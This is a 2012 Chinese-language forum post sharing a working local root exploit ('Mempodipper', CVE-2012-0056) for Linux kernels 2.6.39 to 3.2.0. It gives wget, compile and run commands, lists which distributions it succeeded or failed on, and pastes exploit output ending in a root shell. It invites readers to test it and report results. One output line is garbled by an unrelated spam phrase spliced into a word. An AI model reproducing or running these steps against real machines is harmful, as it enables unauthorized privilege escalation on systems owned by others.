Linux2.6.39到3.2.0爆提权漏洞

[复制链接]
查看221 | 回复0 | 2012-4-1 19:15:35 | 显示全部楼层 |阅读模式
wgethttp://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
ccmempodipper.c
./a.out
在执行完毕后运行whoami来看是否执行成功。
已知发行版情况:

•DebianWheezyTesting:成功。内核3.1.0-1-amd64。DebianSecurityTrackerReport

•Fedora16:失败。内核3.2.1-3.fc16.x86_64

•ArchLinux:失败。内核3.2.2-1-ARCH
如果你测试了,请将测试结果告诉我们!注意告诉我们发行版和uname-a的结果。
我机子上测试成功了
===============================

=Mempodipper=

=byzx2c4=

=Jan21,2012=

===============================
[+]Ptracingsutofindnextinstructionwithoutreadingbinary.

[+]Creatingptracepipe.

[+]Forkingptracechild.

[+]Waitingforptracedchildtogiveoutputonsyscalls.

[+]Ptrace_traceme’ingprocess.

[+]Errormessagewritten.Singlesteppingtofindaddress.

[+]Resolvedcalladdressto0x401ce8.

[+]Openingsocketpair.

[+]Waitingfortran单机传奇erredfdinparent.

[+]Executingchildfromchildfork.

[+]Openingparentmem/proc/20553/meminchild.

[+]Sendingfd6toparent.

[+]Receivedfdat6.

[+]Assigningfd6tostderr.

[+]Calculatingsupadding.

[+]Seekingtooffset0x401cdc.

[+]Executingsuwithshellcode.

#whoami

root
Ubuntu11.10
Linuxdesktop3.0.0-14-generic#23-UbuntuSMPMonNov2120:28:43UTC2011x86_64x86_64x86_64GNU/Linux

*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则